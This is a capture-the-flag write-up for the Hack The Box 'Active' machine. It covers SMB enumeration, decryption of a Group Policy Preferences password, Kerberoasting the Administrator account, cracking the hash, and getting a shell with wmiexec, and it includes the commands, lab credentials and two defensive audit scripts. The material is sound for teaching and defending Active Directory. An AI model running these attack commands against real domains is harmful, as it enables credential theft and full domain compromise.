HTB Active
![[Pasted image 20221004114359.png]]
SYNOPSIS
Skills Required
- Basic knowledge of Active Directory authentication and shared folders
Skills Learned
- SMB enumeration techniques
- Group Policy Preferences Groups.xml enumeration and exploitation
- Identifying and exploiting Kerberoastable accounts
Enumeration
Port scan
masscan -p1-65535 10.129.125.59 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.129.125.59
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-10-04 05:56:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-10-04T05:57:15
|_ start_date: 2022-10-04T03:40:06
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
Enumerating port 445
$ nmap --script safe -p445 10.129.125.59
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 07:14 BST
Pre-scan script results:
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
Nmap scan report for active.htb (10.129.125.59)
Host is up (0.0042s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-mbenum:
|_ ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 1s
|_fcrdns: FAIL (No PTR record)
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-time:
| date: 2022-10-04T06:15:30
|_ start_date: 2022-10-04T03:40:06
| smb2-capabilities:
| 2.0.2:
| Distributed File System
| 2.1:
| Distributed File System
| Leasing
|_ Multi-credit operations
| dns-blacklist:
| SPAM
| l2.apews.org - FAIL
|_ list.quorum.to - FAIL
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)
| smb-protocols:
| dialects:
| 2.0.2
|_ 2.1
| port-states:
| tcp:
|_ open: 445
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
Post-scan script results:
| reverse-index:
|_ 445/tcp: 10.129.125.59
Enumerating SMB
$ smbmap.py -H -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'
$ smbclient -L //10.129.125.59
Enter WORKGROUP\htb-ovuln's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
$ smbclient //$target/Replication
Enter WORKGROUP\htb-ovuln's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
smb: \> dir
. D 0 Sat Jul 21 11:37:44 2018
.. D 0 Sat Jul 21 11:37:44 2018
active.htb D 0 Sat Jul 21 11:37:44 2018
10459647 blocks of size 4096. 5203372 blocks available
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (2.5 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (2.7 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (14.5 KiloBytes/sec) (average 6.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (340.3 KiloBytes/sec) (average 87.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (65.1 KiloBytes/sec) (average 83.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (107.2 KiloBytes/sec) (average 87.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (454.3 KiloBytes/sec) (average 137.5 KiloBytes/sec)
smbmap can also target the Groups.xml file directly:
$ smbmap -R Replication -H 10.129.125.59 -A Groups.xml -q
Mounting the share allows more powerful enumeration (for example, grepping the whole tree):
sudo apt install cifs-utils
mkdir /mnt/Replication
mount -t cifs //10.129.125.59/Replication /mnt/Replication -o username=<username>,password=<password>,domain=active.htb
grep -R password /mnt/Replication
Replication is a copy of SYSVOL, which stores Group Policy; extracting Groups.xml from it is the path to privilege escalation (IppSec).
Set RECURSE to ON and PROMPT to OFF so that mget downloads the whole tree without prompting for each file.
Group Policy Preferences (GPP)
Introduced in Windows Server 2008, Group Policy Preferences allow administrators to modify users and groups across the network. Abuse example: the passwords are AES-256 encrypted and stored in Groups.xml, but in 2012 Microsoft published the AES key on MSDN, meaning any password set through GPP can now be trivially decrypted.
$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
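As an added example (not part of the original writeup or of any tool it uses), the following audit script scans a local copy of SYSVOL, such as the Replication share mirrored above, for Group Policy Preference XML files that still carry a cpassword attribute. The file-name list and the embedded sample XML are constructed; the sample's cpassword is a placeholder, not a real ciphertext, and nothing is decrypted.

```python
import os
import xml.etree.ElementTree as ET

# GPP preference files that can carry an AES-encrypted cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample laid out like the Groups.xml above; the cpassword value
# is a placeholder, not a real ciphertext.
SAMPLE_GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User name="active.htb\\SVC_TGS" changed="2018-07-18 20:46:06">'
    '<Properties action="U" cpassword="PLACEHOLDER-CIPHERTEXT"'
    ' userName="active.htb\\SVC_TGS"/></User></Groups>')

def find_cpasswords(xml_text, path="<memory>"):
    """Return (path, item, account, changed) for every non-empty cpassword.
    Nothing is decrypted; the aim is to find entries that must be removed."""
    findings = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return findings  # unreadable file: report nothing rather than crash
    for parent in root.iter():
        for child in parent:
            if not child.get("cpassword"):
                continue  # empty cpassword means no stored secret
            # Account name sits on <Properties>, the timestamp on its parent.
            account = (child.get("userName") or child.get("accountName")
                       or child.get("runAs") or parent.get("name") or "")
            findings.append((path, parent.tag, account,
                             parent.get("changed", "")))
    return findings

def scan_sysvol(root_dir):
    """Walk a local copy of SYSVOL and audit every known GPP file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                # utf-8-sig tolerates the BOM that GPP files often start with
                with open(full, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), full))
    return findings

if __name__ == "__main__":
    for path, item, account, changed in scan_sysvol("/mnt/Replication"):
        print(f"{path}: <{item}> for {account} (changed {changed})")
```

Every hit is an entry that any domain user can read; the fix is to delete the preference item and rotate the affected account's password.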
Authenticated Enumeration
With valid credentials for the active.htb domain, further enumeration is possible. The SYSVOL and Users shares are now accessible.
ldapsearch can be used to query the domain controller for the Active Directory UserAccountControl attribute of accounts, as well as other specific configurations that may apply to them. Many UserAccountControl values are also security-relevant. The UserAccountControl value 2 corresponds to a disabled account, so the query below returns the enabled users in the active.htb domain by sAMAccountName (username):
$ ldapsearch -x -h 10.129.241.119 -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
sAMAccountName: Administrator
sAMAccountName: SVC_TGS
Impacket's GetADUsers.py simplifies the process of enumerating domain user accounts.
$ GetADUsers.py -all active.htb/svc_tgs -dc-ip $target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Querying 10.129.241.119 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2018-07-18 20:06:40.351723 2022-10-07 04:16:04.670904
Guest <never> <never>
krbtgt 2018-07-18 19:50:36.972031 <never>
SVC_TGS 2018-07-18 21:14:38.402764 2022-10-07 06:05:45.308462
Exploitation
Kerberoasting
Kerberos authentication and Service Principal Names
"Kerberoasting" is used for privilege escalation in an Active Directory domain: the hash of the encrypted material in the Kerberos "Ticket Granting Service" ticket reply (TGS_REP) is extracted and cracked offline to recover the plaintext password. This works because the TGS_REP is encrypted with the NTLM hash of the account in whose context the service instance runs.
![[Pasted image 20221007134730.png]]
Managed service accounts reduce this risk through password complexity, but they are not actively used in many environments. Shutting down the server that hosts the service does not mitigate the attack either, because the attack involves no communication with the target service. It is therefore important to regularly audit the purpose and privileges of all enabled accounts.
Kerberos authentication uses Service Principal Names (SPNs) to identify the account associated with a specific service instance. ldapsearch can be used to identify accounts that have an SPN configured.
$ ldapsearch -x -h $target -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
dn: CN=Administrator,CN=Users,DC=active,DC=htb
servicePrincipalName: active/CIFS:445
active\Administrator appears to have an SPN configured.
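The audit the text calls for, as an added example that is not part of the original writeup: it applies the same logic as the two ldapsearch filters above (the bitwise-AND matching rule on UserAccountControl bit 2, and the `*/*` SPN test) to directory entries and ranks the Kerberoastable accounts. The entries, the privileged-group list, the staleness threshold and the audit date are constructed assumptions.

```python
from datetime import date

UF_ACCOUNTDISABLE = 0x0002  # the "2" tested by the ldapsearch filters above
STALE_DAYS = 365            # passwords older than this crack cheaply offline
TODAY = date(2022, 10, 7)   # constructed audit date
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators",
                     "Account Operators", "Group Policy Creator Owners"}

# Constructed entries shaped like the ldapsearch/GetADUsers output above.
ENTRIES = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200,
     "servicePrincipalName": ["active/CIFS:445"], "pwdLastSet": date(2018, 7, 18),
     "memberOf": ["CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x10202,  # bit 2: disabled
     "servicePrincipalName": ["kadmin/changepw"], "memberOf": [],
     "pwdLastSet": date(2018, 7, 18)},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.active.htb:1433"], "memberOf": [],
     "pwdLastSet": date(2022, 6, 1)},
]

def bit_and_match(value, mask):
    """LDAP_MATCHING_RULE_BIT_AND (1.2.840.113556.1.4.803): all mask bits set."""
    return (value & mask) == mask

def is_enabled(entry):
    return not bit_and_match(entry["userAccountControl"], UF_ACCOUNTDISABLE)

def is_kerberoastable(entry):
    """Enabled account with a service SPN, i.e. (serviceprincipalname=*/*)."""
    return is_enabled(entry) and any("/" in s for s in entry["servicePrincipalName"])

def cn_of(dn):
    return dn.split(",", 1)[0].split("=", 1)[1]  # 'CN=X,...' -> 'X'

def audit(entries, today):
    """(name, severity, reasons) per Kerberoastable account; HIGH when
    privileged or the password is stale, otherwise MEDIUM."""
    report = []
    for e in entries:
        if not is_kerberoastable(e):
            continue
        reasons = [f"SPN {spn}" for spn in e["servicePrincipalName"]]
        privileged = {cn_of(g) for g in e["memberOf"]} & PRIVILEGED_GROUPS
        reasons += [f"member of {g}" for g in sorted(privileged)]
        age = (today - e["pwdLastSet"]).days
        if age > STALE_DAYS:
            reasons.append(f"password last set {age} days ago")
        severity = "HIGH" if privileged or age > STALE_DAYS else "MEDIUM"
        report.append((e["sAMAccountName"], severity, reasons))
    return report
```

A HIGH finding on a built-in administrator, as on this box, means the SPN should be moved to a dedicated (ideally group-managed) service account and the password rotated.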
Impacket's GetUserSPNs.py again simplifies this process, and can also request the TGS and extract the hash for offline cracking.
$ GetUserSPNs.py active.htb/svc_tgs -dc-ip $target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 20:06:40.351723 2022-10-07 04:16:04.670904
$ GetUserSPNs.py active.htb/svc_tgs -dc-ip $target -request
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 20:06:40.351723 2022-10-07 04:16:04.670904
$krb5tgs$23$*Adminis<SNIP>
Cracking of Kerberos TGS Hash
With hashcat or john, the password of active\administrator is easily cracked.
$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable
<SNIP>ff9726:Ticketmaster1968
$ john --format:krb5tgs hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /home/htb-ovuln/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
<SNIP>
Obtaining a Primary Domain Admin shell
Impacket's wmiexec.py can obtain a shell as active\administrator.
$ wmiexec.py active/administrator:Ticketmaster1968@$target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator
C:\>more C:\Users\administrator\Desktop\root.txt
Bonus: The "Old School" Kerberoasting Technique
There are several Kerberoasting methods for Windows and Linux; reproduced below is Tim Medin's original Kerberoasting technique, which uses functionality in Benjamin Delpy's Mimikatz to export Kerberos tickets.
On a domain computer, the built-in utility setspn.exe can enumerate the available SPNs and their associated accounts.
> whoami
active\svc_tgs
> setspn -T active.htb -F -Q */*
Request the tickets and export them from RAM.
SYSVOL is a domain-wide share in Active Directory that all authenticated users can read. It contains logon scripts and Group Policy data, which is what makes exploiting Group Policy Preferences possible.
Domain Group Policy storage location: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
Notes
Mining SYSVOL for credentials
Terminology: Service Principal Names (SPN); service instance